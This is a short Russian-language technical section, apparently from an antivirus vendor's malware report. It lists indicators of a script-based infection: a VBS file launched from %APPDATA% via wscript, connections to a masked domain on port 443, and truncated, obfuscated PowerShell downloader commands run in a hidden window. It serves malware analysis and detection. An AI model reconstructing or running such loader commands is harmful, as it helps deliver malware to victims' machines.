Техническая информация
- '<SYSTEM32>\wscript.exe' "%APPDATA%\rFECN.vbs"
- %APPDATA%\rfecn.vbs
- %APPDATA%\rfecn.vbs
- 'me###anong.com':443
- 'me###anong.com':443
- DNS ASK me###anong.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'e...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'e...